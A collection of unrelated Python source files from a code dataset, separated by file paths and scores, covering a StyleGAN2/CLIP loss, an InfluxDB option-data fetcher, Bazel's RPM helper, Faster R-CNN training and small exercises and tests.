import numpy as np import torch from torch_utils import training_stats from torch_utils import misc from torch_utils.ops import conv2d_gradfix import torch.nn.functional as F import torchvision.transforms as T import clip import dnnlib import random #---------------------------------------------------------------------------- class Loss: def accumulate_gradients(self, phase, real_img, real_c, gen_z, gen_c, sync, gain, real_features): # to be overridden by subclass raise NotImplementedError() class Model(torch.nn.Module): def __init__(self, device): super(Model, self).__init__() self.linear1 = torch.nn.Linear(512, 1024) self.linear2 = torch.nn.Linear(1024, 1024) self.linear3 = torch.nn.Linear(1024, 1024) self.linear4 = torch.nn.Linear(1024, 512) self.linear5 = torch.nn.Linear(512, 1024) self.linear6 = torch.nn.Linear(1024, 1024) self.linear7 = torch.nn.Linear(1024, 1024) self.linear8 = torch.nn.Linear(1024, 512) self.device = device def forward(self, x): mu = F.leaky_relu(self.linear1(x)) mu = F.leaky_relu(self.linear2(mu)) mu = F.leaky_relu(self.linear3(mu)) mu = self.linear4(mu) std = F.leaky_relu(self.linear5(x)) std = F.leaky_relu(self.linear6(std)) std = F.leaky_relu(self.linear7(std)) std = self.linear8(std) return mu + std.exp()*(torch.randn(mu.shape).to(self.device)) def loss(self, real, fake, temp=0.1, lam=0.5): sim = torch.cosine_similarity(real.unsqueeze(1), fake.unsqueeze(0), dim=-1) if temp > 0.: sim = torch.exp(sim/temp) sim1 = torch.diagonal(F.softmax(sim, dim=1))*temp sim2 = torch.diagonal(F.softmax(sim, dim=0))*temp if 0.<lam < 1.: return -(lam*torch.log(sim1) + (1.-lam)*torch.log(sim2)) elif lam == 0: return -torch.log(sim2) else: return -torch.log(sim1) else: return -torch.diagonal(sim) #---------------------------------------------------------------------------- class StyleGAN2Loss(Loss): def __init__(self, device, G_mapping, G_synthesis, G_mani, D, augment_pipe=None, style_mixing_prob=0.9, r1_gamma=10, pl_batch_shrink=2, pl_decay=0.01, 
pl_weight=2): super().__init__() self.device = device self.G_mapping = G_mapping self.G_synthesis = G_synthesis self.G_mani = G_mani self.D = D self.augment_pipe = augment_pipe self.style_mixing_prob = style_mixing_prob self.r1_gamma = r1_gamma self.pl_batch_shrink = pl_batch_shrink self.pl_decay = pl_decay self.pl_weight = pl_weight self.pl_mean = torch.zeros([], device=device) clip_model, _ = clip.load("ViT-B/32", device=device) # Load CLIP model here self.clip_model = clip_model.eval() self.mapper = Model(device) self.mapper.load_state_dict(torch.load('./implicit.0.001.64.True.0.0.pth', map_location='cpu')) # path to the noise mapping network self.mapper.to(device) def run_G(self, z, c, sync, txt_fts=None, ): with misc.ddp_sync(self.G_mapping, sync): ws = self.G_mapping(z, c) if self.style_mixing_prob > 0: new_ws = self.G_mapping(torch.randn_like(z), c, skip_w_avg_update=True) with torch.autograd.profiler.record_function('style_mixing'): cutoff = torch.empty([], dtype=torch.int64, device=ws.device).random_(1, ws.shape[1]) cutoff = torch.where(torch.rand([], device=ws.device) < self.style_mixing_prob, cutoff, torch.full_like(cutoff, ws.shape[1])) ws[:, cutoff:] = new_ws[:, cutoff:] with misc.ddp_sync(self.G_synthesis, sync): img = self.G_synthesis(ws, fts=txt_fts) return img, ws def run_D(self, img, c, sync, fts=None): if self.augment_pipe is not None: img = self.augment_pipe(img) with misc.ddp_sync(self.D, sync): logits, d_fts = self.D(img, c, fts=fts) return logits, d_fts def normalize(self): return T.Compose([ T.Normalize((0.48145466, 0.4578275, 0.40821073), (0.26862954, 0.26130258, 0.27577711)), ]) def full_preprocess(self, img, mode='bicubic', ratio=0.5): full_size = img.shape[-2] if full_size < 224: pad_1 = torch.randint(0, 224-full_size, ()) pad_2 = torch.randint(0, 224-full_size, ()) m = torch.nn.ConstantPad2d((pad_1, 224-full_size-pad_1, pad_2, 224-full_size-pad_2), 1.) 
reshaped_img = m(img) else: cut_size = torch.randint(int(ratio*full_size), full_size, ()) left = torch.randint(0, full_size-cut_size, ()) top = torch.randint(0, full_size-cut_size, ()) cropped_img = img[:, :, top:top+cut_size, left:left+cut_size] reshaped_img = F.interpolate(cropped_img, (224, 224), mode=mode, align_corners=False) reshaped_img = (reshaped_img + 1.)*0.5 # range in [0., 1.] now reshaped_img = self.normalize()(reshaped_img) return reshaped_img def custom_preprocess(self, img, ind, cut_num, mode='bicubic'): # more to be implemented here full_size = img.shape[-2] grid = np.sqrt(cut_num) most_right = min(int((ind%grid + 1)*full_size/grid), full_size) most_bottom = min(int((ind//grid + 1)*full_size/grid), full_size) cut_size = torch.randint(int(full_size//(grid+1)), int(min(min(full_size//2, most_right), most_bottom)), ()) # TODO: tune this later left = torch.randint(0, most_right-cut_size, ()) top = torch.randint(0, most_bottom-cut_size, ()) cropped_img = img[:, :, top:top+cut_size, left:left+cut_size] reshaped_img = F.interpolate(cropped_img, (224, 224), mode=mode, align_corners=False) reshaped_img = (reshaped_img + 1.)*0.5 # range in [0., 1.] now reshaped_img = self.normalize()(reshaped_img) return reshaped_img def contra_loss(self, temp, mat1, mat2, lam): sim = torch.cosine_similarity(mat1.unsqueeze(1), mat2.unsqueeze(0), dim=-1) if temp > 0.: sim = torch.exp(sim/temp) # This implementation is incorrect, it should be sim=sim/temp. # However, this incorrect implementation can reproduce our results with provided hyper-parameters. # If you want to use the correct implementation, please manually revise it. 
# The correct implementation should lead to better results, but don't use our provided hyper-parameters, you need to carefully tune lam, temp, itd, itc and other hyper-parameters sim1 = torch.diagonal(F.softmax(sim, dim=1))*temp sim2 = torch.diagonal(F.softmax(sim, dim=0))*temp if 0.<lam < 1.: return lam*torch.log(sim1) + (1.-lam)*torch.log(sim2) elif lam == 0: return torch.log(sim2) else: return torch.log(sim1) else: return torch.diagonal(sim) def accumulate_gradients(self, phase, real_img, real_c, gen_z, gen_c, sync, gain, img_fts, txt_fts, lam, temp, gather, d_use_fts, itd, itc, iid, iic, mixing_prob=0.): assert phase in ['Gmain', 'Greg', 'Gboth', 'Dmain', 'Dreg', 'Dboth'] do_Gmain = (phase in ['Gmain', 'Gboth']) do_Dmain = (phase in ['Dmain', 'Dboth']) do_Gpl = (phase in ['Greg', 'Gboth']) and (self.pl_weight != 0) do_Dr1 = (phase in ['Dreg', 'Dboth']) and (self.r1_gamma != 0) # augmentation aug_level_1 = 0.1 aug_level_2 = 0.75 # print(torch.cosine_similarity(img_fts, txt_fts, dim=-1)) mixing_prob = mixing_prob # probability to use img_fts instead of txt_fts random_noise = torch.randn(txt_fts.shape).to(img_fts.device)# + torch.randn((1, 512)).to(img_fts.device) random_noise = random_noise/random_noise.norm(dim=-1, keepdim=True) txt_fts_ = txt_fts*(1-aug_level_1) + random_noise*aug_level_1 txt_fts_ = txt_fts_/txt_fts_.norm(dim=-1, keepdim=True) if txt_fts.shape[-1] == img_fts.shape[-1]: # # Gaussian purterbation img_fts_ = img_fts*(1-aug_level_2) + random_noise*aug_level_2 # learned generation # with torch.no_grad(): # normed_real_full_img = self.full_preprocess(real_img, ratio=0.99) # img_fts_real_full_ = self.clip_model.encode_image(normed_real_full_img).float() # img_fts_real_full_ = img_fts_real_full_/img_fts_real_full_.norm(dim=-1, keepdim=True) # # img_fts_real_full_ = img_fts # img_fts_ = self.mapper(img_fts_real_full_) + img_fts_real_full_ img_fts_ = img_fts_/img_fts_.norm(dim=-1, keepdim=True) if mixing_prob > 0.99: txt_fts_ = img_fts_ elif mixing_prob 
< 0.01: txt_fts_ = txt_fts_ else: txt_fts_ = torch.where(torch.rand([txt_fts_.shape[0], 1], device=txt_fts_.device) < mixing_prob, img_fts_, txt_fts_) img_img_d = iid # discriminator img_img_c = iic # clip img_txt_d = itd # discriminator img_txt_c = itc # clip temp = temp lam = lam def gather_tensor(input_tensor, gather_or_not): if gather_or_not: world_size = torch.distributed.get_world_size() rank = torch.distributed.get_rank() output_tensor = [torch.zeros_like(input_tensor) for _ in range(world_size)] torch.distributed.all_gather(output_tensor, input_tensor) output_tensor[rank] = input_tensor # # print(torch.cat(output_tensor).size()) return torch.cat(output_tensor) else: return input_tensor txt_fts_all = gather_tensor(txt_fts_, gather) # Gmain: Maximize logits for generated images. if do_Gmain: with torch.autograd.profiler.record_function('Gmain_forward'): gen_img, _gen_ws = self.run_G(gen_z, gen_c, txt_fts=txt_fts_, sync=(sync and not do_Gpl)) # May get synced by Gpl. gen_logits, gen_d_fts = self.run_D(gen_img, gen_c, sync=False, fts=txt_fts_) gen_d_fts_all = gather_tensor(gen_d_fts, gather) training_stats.report('Loss/scores/fake', gen_logits) training_stats.report('Loss/signs/fake', gen_logits.sign()) loss_Gmain = torch.nn.functional.softplus(-gen_logits) # -log(sigmoid(gen_logits)) normed_gen_full_img = self.full_preprocess(gen_img) img_fts_gen_full = self.clip_model.encode_image(normed_gen_full_img) img_fts_gen_full = img_fts_gen_full/img_fts_gen_full.norm(dim=-1, keepdim=True) img_fts_gen_full_all = gather_tensor(img_fts_gen_full, gather) img_fts_all = gather_tensor(img_fts, gather) if img_txt_c > 0.: clip_loss_img_txt = self.contra_loss(temp, img_fts_gen_full_all, txt_fts_all, lam) loss_Gmain = loss_Gmain - img_txt_c*clip_loss_img_txt.mean() if img_img_c > 0.: clip_loss_img_img = self.contra_loss(temp, img_fts_gen_full_all, img_fts_all, lam) loss_Gmain = loss_Gmain - img_img_c*clip_loss_img_img.mean() if img_txt_d > 0.: loss_Gmain = loss_Gmain - 
img_txt_d*self.contra_loss(temp, gen_d_fts_all, txt_fts_all, lam).mean() if img_img_d > 0.: with torch.no_grad(): _, g_real_d_fts = self.run_D(real_img.detach(), real_c, sync=False, fts=txt_fts_) g_real_d_fts_all = gather_tensor(g_real_d_fts, gather) loss_Gmain = loss_Gmain - img_img_d*self.contra_loss(temp, g_real_d_fts_all, gen_d_fts_all, lam).mean() training_stats.report('Loss/G/loss', loss_Gmain) with torch.autograd.profiler.record_function('Gmain_backward'): loss_Gmain.mean().mul(gain).backward() # Gpl: Apply path length regularization. if do_Gpl: with torch.autograd.profiler.record_function('Gpl_forward'): batch_size = gen_z.shape[0] // self.pl_batch_shrink txt_fts_0 = txt_fts_[:batch_size] txt_fts_0.requires_grad_() gen_img, gen_ws = self.run_G(gen_z[:batch_size], gen_c[:batch_size], txt_fts=txt_fts_0, sync=sync) pl_noise = torch.randn_like(gen_img) / np.sqrt(gen_img.shape[2] * gen_img.shape[3]) with torch.autograd.profiler.record_function('pl_grads'), conv2d_gradfix.no_weight_gradients(): if d_use_fts: pl_grads = torch.autograd.grad(outputs=[(gen_img * pl_noise).sum()], inputs=[gen_ws, txt_fts_0], create_graph=True, only_inputs=True)[0] else: pl_grads = torch.autograd.grad(outputs=[(gen_img * pl_noise).sum()], inputs=[gen_ws], create_graph=True, only_inputs=True)[0] pl_lengths = pl_grads.square().sum(2).mean(1).sqrt() pl_mean = self.pl_mean.lerp(pl_lengths.mean(), self.pl_decay) self.pl_mean.copy_(pl_mean.detach()) pl_penalty = (pl_lengths - pl_mean).square() training_stats.report('Loss/pl_penalty', pl_penalty) loss_Gpl = pl_penalty * self.pl_weight training_stats.report('Loss/G/reg', loss_Gpl) with torch.autograd.profiler.record_function('Gpl_backward'): (gen_img[:, 0, 0, 0] * 0 + loss_Gpl).mean().mul(gain).backward() # Dmain: Minimize logits for generated images. 
loss_Dgen = 0 if do_Dmain: with torch.autograd.profiler.record_function('Dgen_forward'): gen_img, _gen_ws = self.run_G(gen_z, gen_c, txt_fts=txt_fts_, sync=False) gen_logits, gen_d_fts = self.run_D(gen_img, gen_c, sync=False, fts=txt_fts_) # Gets synced by loss_Dreal. training_stats.report('Loss/scores/fake', gen_logits) training_stats.report('Loss/signs/fake', gen_logits.sign()) loss_Dgen = torch.nn.functional.softplus(gen_logits) # -log(1 - sigmoid(gen_logits)) with torch.autograd.profiler.record_function('Dgen_backward'): loss_Dgen.mean().mul(gain).backward() # Dmain: Maximize logits for real images. # Dr1: Apply R1 regularization. if do_Dmain or do_Dr1: name = 'Dreal_Dr1' if do_Dmain and do_Dr1 else 'Dreal' if do_Dmain else 'Dr1' with torch.autograd.profiler.record_function(name + '_forward'): real_img_tmp = real_img.detach().requires_grad_(do_Dr1) real_logits, real_d_fts = self.run_D(real_img_tmp, real_c, sync=sync, fts=txt_fts_) training_stats.report('Loss/scores/real', real_logits) training_stats.report('Loss/signs/real', real_logits.sign()) loss_Dreal = 0 if do_Dmain: loss_Dreal = torch.nn.functional.softplus(-real_logits) # -log(sigmoid(real_logits)) if img_txt_d > 0.: real_d_fts_all = gather_tensor(real_d_fts, gather) loss_Dreal = loss_Dreal - img_txt_d*self.contra_loss(temp, real_d_fts_all, txt_fts_all, lam).mean() training_stats.report('Loss/D/loss', loss_Dgen + loss_Dreal) loss_Dr1 = 0 if do_Dr1: with torch.autograd.profiler.record_function('r1_grads'), conv2d_gradfix.no_weight_gradients(): r1_grads = torch.autograd.grad(outputs=[real_logits.sum()], inputs=[real_img_tmp], create_graph=True, only_inputs=True)[0] r1_penalty = r1_grads.square().sum([1,2,3]) loss_Dr1 = r1_penalty * (self.r1_gamma / 2) training_stats.report('Loss/r1_penalty', r1_penalty) training_stats.report('Loss/D/reg', loss_Dr1) with torch.autograd.profiler.record_function(name + '_backward'): (real_logits * 0 + loss_Dreal + loss_Dr1).mean().mul(gain).backward() # 
----------------------------------------------------------------------------
2.53125
3
lib/oitool/fetchoi.py
stockalgo/oichart
8
16714
<reponame>stockalgo/oichart<filename>lib/oitool/fetchoi.py import time import logging from bandl.nse_data import NseData from influxdb import InfluxDBClient class FetchOI: def __init__(self,source=None,influxdb_client=None,database="oitool",log_path=None,logLevel='info'): """[summary] :param source: stock broker :type source: string, optional :param influxdb_client: influxdb client object, defaults to None :type influxdb_client: object, optional :param database: name of databse, defaults to "oitool" :type database: str, optional :param log_path: log file path, defaults to None :type log_path: str, optional :param logLevel: log level, defaults to 'info' :type logLevel: str, optional :raises Exception: database error/ bandl error """ try: if not influxdb_client: self.client = InfluxDBClient(database=database) else: self.client = influxdb_client self.client.create_database(database) if not source: self.feeder = NseData() else: raise("Sources will be supported in future release") # setting logs if not log_path: log_path = "OItool_logs_"+ time.strftime("%Y-%m-%d_%H-%M-%S") + ".txt" log_file = logging.FileHandler(log_path, 'a') formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s') log_file.setFormatter(formatter) log = logging.getLogger() # root logger log.addHandler(log_file) # set the new handler numeric_log_level = getattr(logging, logLevel.upper(), 10) log.setLevel(numeric_log_level) except Exception as err: logging.error('%s raised an error', str(err)) raise Exception("Error occurred in OItool initialization: ",str(err)) def subscribe(self,symbol,level=10): """ To register ticker for data :param symbol: ticker to fetch option data :type symbol: string :param level: number of option strike from ATM :type symbols: interger """ self.symbol = symbol self.level = level def create_influx_data(self,price,option_data,measurement): tags = {"price":price} fields = {} for keys in option_data: fields[str(keys)+" ce"] = 
option_data[keys]["CE"]["openInterest"] fields[str(keys)+" pe"] = option_data[keys]["PE"]["openInterest"] logging.info(fields) influx_json = [{"measurement": measurement,"tags":tags,"fields":fields}] return influx_json def get_option_data(symbol,strikes=None,expiry_date=None): return self.feeder.get_option_data(symbol=symbol,strikes=strikes,expiry_date=expiry_date) def start(self,interval=90,runtime=21600): """To start fetching data into influxdb :param interval: wait between data capture, defaults to 90 Seconds :type interval: int, optional :param runtime: runtime for script, defaults to 21600 :type runtime: int, optional :raises Exception: InfluxDb error/ bandl error """ if not self.symbol: raise Exception ("Symbol not subscribed.") starttime = time.time() strikes = self.feeder.get_oc_strike_prices(self.symbol,level=self.level) prev_dict = None while(True): try: price,oc_data = self.feeder.get_option_data(self.symbol,strikes=strikes) if prev_dict == oc_data: time.sleep(15) continue else: prev_dict = oc_data formated_data = self.create_influx_data(price,option_data=oc_data,measurement=self.symbol) self.client.write_points(formated_data) except Exception as exc: logging.debug(str(exc)) print("Error Occurred,Don't worry. We try again. Error: ",str(exc)) timenow = time.time() if(timenow - starttime >= runtime): break time.sleep(interval)
2.359375
2
notebooks/HelperFunctions/RunModel.py
hh2110/continual-ml-stocks
0
16715
from sklearn.model_selection import train_test_split from sklearn import metrics from sklearn.metrics import accuracy_score from sklearn.metrics import roc_auc_score import numpy as np import pandas as pd import matplotlib.pyplot as plt def do_ml(merged_df, test_size, ml_model, **kwargs): train_data = merged_df.drop( columns=[ "lagged_poc", "price_date", "label_id", # "Low", # "High", # "Open", # "Close", # "Adj Close", # "positive_poc", "negative_poc", ] ) target = merged_df[["lagged_poc"]] X_train, X_test, y_train, y_test = train_test_split( np.array(train_data), np.array(target), test_size=test_size, random_state=1 ) model = ml_model(**kwargs) # Fit on training data model.fit(X_train, np.ravel(y_train)) # Actual class predictions predictions = model.predict(X_test) confusion_matrix = metrics.confusion_matrix(y_test, predictions) accuracy_score = metrics.accuracy_score(y_test, predictions) # feature importance plot_feature_importance(model, train_data) return confusion_matrix, accuracy_score def plot_feature_importance(model, train_data): featureImportances = model.feature_importances_ fiDF = pd.DataFrame() fiDF["fi"] = featureImportances fiDF["f"] = train_data.columns fiDF = fiDF.sort_values("fi", ascending=False) fiDF.head() nf = 50 plt.rcParams.update({"font.size": 8}) plt.figure(figsize=(8, 4)) plt.plot(fiDF.f.iloc[0:nf], fiDF.fi.iloc[0:nf]) plt.xticks(rotation=90) plt.show()
2.84375
3
tools/build_defs/pkg/make_rpm.py
jpieper-tri/bazel
1
16716
# Copyright 2017 The Bazel Authors. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """A simple cross-platform helper to create an RPM package.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import contextlib import fileinput import os import re import shutil import subprocess import sys from tempfile import mkdtemp # pylint: disable=g-direct-third-party-import from third_party.py import gflags gflags.DEFINE_string('name', '', 'The name of the software being packaged.') gflags.DEFINE_string('version', '', 'The version of the software being packaged.') gflags.DEFINE_string('release', '', 'The release of the software being packaged.') gflags.DEFINE_string('arch', '', 'The CPU architecture of the software being packaged.') gflags.DEFINE_string('spec_file', '', 'The file containing the RPM specification.') gflags.DEFINE_string('out_file', '', 'The destination to save the resulting RPM file to.') # Setup to safely create a temporary directory and clean it up when done. @contextlib.contextmanager def Cd(newdir, cleanup=lambda: True): """Change the current working directory. This will run the provided cleanup function when the context exits and the previous working directory is restored. Args: newdir: The directory to change to. This must already exist. cleanup: An optional cleanup function to be executed when the context exits. Yields: Nothing. 
""" prevdir = os.getcwd() os.chdir(os.path.expanduser(newdir)) try: yield finally: os.chdir(prevdir) cleanup() @contextlib.contextmanager def Tempdir(): """Create a new temporary directory and change to it. The temporary directory will be removed when the context exits. Yields: The full path of the temporary directory. """ dirpath = mkdtemp() def Cleanup(): shutil.rmtree(dirpath) with Cd(dirpath, Cleanup): yield dirpath def GetFlagValue(flagvalue, strip=True): if flagvalue: if flagvalue[0] == '@': with open(flagvalue[1:], 'r') as f: flagvalue = f.read() if strip: return flagvalue.strip() return flagvalue WROTE_FILE_RE = re.compile(r'Wrote: (?P<rpm_path>.+)', re.MULTILINE) def FindOutputFile(log): """Find the written file from the log information.""" m = WROTE_FILE_RE.search(log) if m: return m.group('rpm_path') return None def CopyAndRewrite(input_file, output_file, replacements=None): """Copies the given file and optionally rewrites with replacements. Args: input_file: The file to copy. output_file: The file to write to. replacements: A dictionary of replacements. Keys are prefixes scan for, values are the replacements to write after the prefix. 
""" with open(output_file, 'w') as output: for line in fileinput.input(input_file): if replacements: for prefix, text in replacements.items(): if line.startswith(prefix): line = prefix + ' ' + text + '\n' break output.write(line) def Which(program): def IsExe(fpath): return os.path.isfile(fpath) and os.access(fpath, os.X_OK) for path in os.environ['PATH'].split(os.pathsep): filename = os.path.join(path, program) if IsExe(filename): return filename return None class NoRpmbuildFound(Exception): pass def FindRpmbuild(): path = Which('rpmbuild') if path: return path else: raise NoRpmbuildFound() class RpmBuilder(object): """A helper class to manage building the RPM file.""" SOURCE_DIR = 'SOURCES' BUILD_DIR = 'BUILD' TEMP_DIR = 'TMP' DIRS = [SOURCE_DIR, BUILD_DIR, TEMP_DIR] def __init__(self, name, version, release, arch): self.name = name self.version = GetFlagValue(version) self.release = GetFlagValue(release) self.arch = arch self.files = [] self.rpmbuild_path = FindRpmbuild() self.rpm_path = None def AddFiles(self, files): """Add a set of files to the current RPM.""" self.files += files def SetupWorkdir(self, spec_file, original_dir): """Create the needed structure in the workdir.""" # Create directory structure. for name in RpmBuilder.DIRS: if not os.path.exists(name): os.makedirs(name, 0o777) # Copy the files. for f in self.files: dst_dir = os.path.join(RpmBuilder.BUILD_DIR, os.path.dirname(f)) if not os.path.exists(dst_dir): os.makedirs(dst_dir, 0o777) shutil.copy(os.path.join(original_dir, f), dst_dir) # Copy the spec file, updating with the correct version. 
spec_origin = os.path.join(original_dir, spec_file) self.spec_file = os.path.basename(spec_file) replacements = {} if self.version: replacements['Version:'] = self.version if self.release: replacements['Release:'] = self.release CopyAndRewrite(spec_origin, self.spec_file, replacements) def CallRpmBuild(self, dirname): """Call rpmbuild with the correct arguments.""" args = [ self.rpmbuild_path, '--define', '_topdir %s' % dirname, '--define', '_tmppath %s/TMP' % dirname, '--bb', self.spec_file, ] p = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.STDOUT) output = p.communicate()[0] if p.returncode == 0: # Find the created file. self.rpm_path = FindOutputFile(output) if p.returncode != 0 or not self.rpm_path: print('Error calling rpmbuild:') print(output) # Return the status. return p.returncode def SaveResult(self, out_file): """Save the result RPM out of the temporary working directory.""" if self.rpm_path: shutil.copy(self.rpm_path, out_file) print('Saved RPM file to %s' % out_file) else: print('No RPM file created.') def Build(self, spec_file, out_file): """Build the RPM described by the spec_file.""" print('Building RPM for %s at %s' % (self.name, out_file)) original_dir = os.getcwd() spec_file = os.path.join(original_dir, spec_file) out_file = os.path.join(original_dir, out_file) with Tempdir() as dirname: self.SetupWorkdir(spec_file, original_dir) status = self.CallRpmBuild(dirname) self.SaveResult(out_file) return status def main(argv=()): try: builder = RpmBuilder(FLAGS.name, FLAGS.version, FLAGS.release, FLAGS.arch) builder.AddFiles(argv[1:]) return builder.Build(FLAGS.spec_file, FLAGS.out_file) except NoRpmbuildFound: print('ERROR: rpmbuild is required but is not present in PATH') return 1 if __name__ == '__main__': FLAGS = gflags.FLAGS main(FLAGS(sys.argv))
1.890625
2
data/datasets/gb_100.py
CharleyZhao123/graceful-few-shot
1
16717
<filename>data/datasets/gb_100.py import os import pickle import random from torch.utils.data import Dataset from .datasets import dataset_register default_split = { 'train': 0.7, 'val': 0.3, } @dataset_register('gb-100') class GB100(Dataset): def __init__(self, root_path, split='train', split_method='novel', **kwargs): data_file_name = 'gb_dataset.pickle' with open(os.path.join(root_path, data_file_name), 'rb') as f: pack = pickle.load(f, encoding='latin1') # 经过默认数据处理[Resize, ToTensor, normalize]的图像tensor,可直接输入Network default_data = pack['data'] feature = pack['feature'] imgname = pack['imgname'] origin_label = pack['origin_label'] logits = pack['logits'] gb_label = pack['gb_label'] # 划分数据 g_index = [] b_index = [] for i, l in enumerate(gb_label): if l == 1.0: g_index.append(i) else: b_index.append(i) if split_method == 'random': # 随机抽取数据并划分数据 random.seed(0) train_g_index = random.sample(g_index, int( len(g_index)*default_split['train'])) val_g_index = list(set(g_index).difference(set(train_g_index))) random.seed(1) train_b_index = random.sample(b_index, int( len(b_index)*default_split['train'])) val_b_index = list(set(b_index).difference(set(train_b_index))) train_index = train_g_index + train_b_index val_index = val_g_index + val_b_index else: # 前n个class为训练集, 后64-n个为验证集划分数据 t_class_num = int(default_split['train'] * 64) # n v_class_num = 64 - t_class_num train_g_index = g_index[:100*t_class_num] val_g_index = g_index[100*t_class_num:] train_b_index = b_index[:100*t_class_num] val_b_index = b_index[100*t_class_num:] train_index = train_g_index + train_b_index val_index = val_g_index + val_b_index if split == 'train': self.index_list = train_index else: self.index_list = val_index self.data = default_data self.feature = feature self.gb_label = gb_label def __len__(self): return len(self.index_list) def __getitem__(self, i): index = self.index_list[i] return self.data[index], self.feature[index], int(self.gb_label[index]) if __name__ == '__main__': gb_100 = GB100( 
root_path='/space1/zhaoqing/dataset/fsl/gb-100', split='val', split_method='novel') print(len(gb_100)) # random # val 3840 # train 8960 # novel # val 4000 # train 8800
2.578125
3
examples/analyze-outdated.py
duzvik/project-freta
67
16718
#!/usr/bin/env python # # Copyright (c) Microsoft Corporation. # Licensed under the MIT License. # # Re-analyze all images that don't have latest version of the analysis available from freta.api import Freta def main(): freta = Freta() versions = freta.versions() for image in freta.image.list(): if ( image["state"] == "Report available" and image["analysis_version"] != versions["analysis"] ): print("redoing %s" % image["image_id"]) freta.image.analyze(image["image_id"]) if __name__ == "__main__": main()
2.640625
3
utils/utils_fit.py
bubbliiiing/faster-rcnn-keras
282
16719
import numpy as np import tensorflow as tf from keras import backend as K from tqdm import tqdm def write_log(callback, names, logs, batch_no): for name, value in zip(names, logs): summary = tf.Summary() summary_value = summary.value.add() summary_value.simple_value = value summary_value.tag = name callback.writer.add_summary(summary, batch_no) callback.writer.flush() def fit_one_epoch(model_rpn, model_all, loss_history, callback, epoch, epoch_step, epoch_step_val, gen, gen_val, Epoch, anchors, bbox_util, roi_helper): total_loss = 0 rpn_loc_loss = 0 rpn_cls_loss = 0 roi_loc_loss = 0 roi_cls_loss = 0 val_loss = 0 with tqdm(total=epoch_step,desc=f'Epoch {epoch + 1}/{Epoch}',postfix=dict,mininterval=0.3) as pbar: for iteration, batch in enumerate(gen): if iteration >= epoch_step: break X, Y, boxes = batch[0], batch[1], batch[2] P_rpn = model_rpn.predict_on_batch(X) results = bbox_util.detection_out_rpn(P_rpn, anchors) roi_inputs = [] out_classes = [] out_regrs = [] for i in range(len(X)): R = results[i] X2, Y1, Y2 = roi_helper.calc_iou(R, boxes[i]) roi_inputs.append(X2) out_classes.append(Y1) out_regrs.append(Y2) loss_class = model_all.train_on_batch([X, np.array(roi_inputs)], [Y[0], Y[1], np.array(out_classes), np.array(out_regrs)]) write_log(callback, ['total_loss','rpn_cls_loss', 'rpn_reg_loss', 'detection_cls_loss', 'detection_reg_loss'], loss_class, iteration) rpn_cls_loss += loss_class[1] rpn_loc_loss += loss_class[2] roi_cls_loss += loss_class[3] roi_loc_loss += loss_class[4] total_loss = rpn_loc_loss + rpn_cls_loss + roi_loc_loss + roi_cls_loss pbar.set_postfix(**{'total' : total_loss / (iteration + 1), 'rpn_cls' : rpn_cls_loss / (iteration + 1), 'rpn_loc' : rpn_loc_loss / (iteration + 1), 'roi_cls' : roi_cls_loss / (iteration + 1), 'roi_loc' : roi_loc_loss / (iteration + 1), 'lr' : K.get_value(model_rpn.optimizer.lr)}) pbar.update(1) print('Start Validation') with tqdm(total=epoch_step_val, desc=f'Epoch {epoch + 1}/{Epoch}',postfix=dict,mininterval=0.3) as 
pbar: for iteration, batch in enumerate(gen_val): if iteration >= epoch_step_val: break X, Y, boxes = batch[0], batch[1], batch[2] P_rpn = model_rpn.predict_on_batch(X) results = bbox_util.detection_out_rpn(P_rpn, anchors) roi_inputs = [] out_classes = [] out_regrs = [] for i in range(len(X)): R = results[i] X2, Y1, Y2 = roi_helper.calc_iou(R, boxes[i]) roi_inputs.append(X2) out_classes.append(Y1) out_regrs.append(Y2) loss_class = model_all.test_on_batch([X, np.array(roi_inputs)], [Y[0], Y[1], np.array(out_classes), np.array(out_regrs)]) val_loss += loss_class[0] pbar.set_postfix(**{'total' : val_loss / (iteration + 1)}) pbar.update(1) logs = {'loss': total_loss / epoch_step, 'val_loss': val_loss / epoch_step_val} loss_history.on_epoch_end([], logs) print('Epoch:'+ str(epoch+1) + '/' + str(Epoch)) print('Total Loss: %.3f || Val Loss: %.3f ' % (total_loss / epoch_step, val_loss / epoch_step_val)) model_all.save_weights('logs/ep%03d-loss%.3f-val_loss%.3f.h5' % (epoch + 1, total_loss / epoch_step, val_loss / epoch_step_val))
2.296875
2
__init__.py
sbalen/TrafficSignsDataset
1
16720
"""TrafficSignDataset dataset.""" from .TrafficSignsDataset import Trafficsignsdataset
1
1
exercicios-Python/ex042.py
pedrosimoes-programmer/exercicios-python
0
16721
<filename>exercicios-Python/ex042.py #Refaça o DESAFIO 035 dos triângulos, acrescentando o recurso de mostrar que tipo de triângulo será formado: #- EQUILÁTERO: todos os lados iguais #- ISÓSCELES: dois lados iguais, um diferente #- ESCALENO: todos os lados diferentes print('-' * 20, 'Programa Analisador de Triângulos', '-' * 20) seg1 = float(input('Digite o valor do primeiro segmento: ')) seg2 = float(input('Digite o valor do segundo segmento: ')) seg3 = float(input('Digite o valor do terceiro segmento: ')) if seg1 < seg2 + seg3 and seg2 < seg1 + seg3 and seg3 < seg1 + seg2: if seg1 == seg2 and seg3: # outra possibilidade --> seg1 == seg2 == seg3: print('Os segmentos PODEM formar um triângulo do tipo EQUILÁTERO!') elif seg1 != seg2 != seg3 != seg1: print('Os segmentos acima PODEM formar um triângulo do tipo ESCALENO!') else: print('Os segmentos acima PODEM formar um triângulo do tipo ISÓSCELES!') else: print('Os segmentos NÃO PODEM formar um triângulo!')
4.25
4
tests/test_extension.py
PeterWurmsdobler/mopidy-vfd
0
16722
from mopidy_vfd import Extension def test_get_default_config(): ext = Extension() config = ext.get_default_config() assert "[vfd]" in config assert "enabled = true" in config def test_get_config_schema(): ext = Extension() schema = ext.get_config_schema() assert "display" in schema
2.125
2
backend/venv/src/api/ordercampproduct/apps.py
AkashSDas/camps_for_champs
0
16723
<filename>backend/venv/src/api/ordercampproduct/apps.py from django.apps import AppConfig class OrdercampproductConfig(AppConfig): name = 'api.ordercampproduct'
1.390625
1
onnx_tf/handlers/backend/identity.py
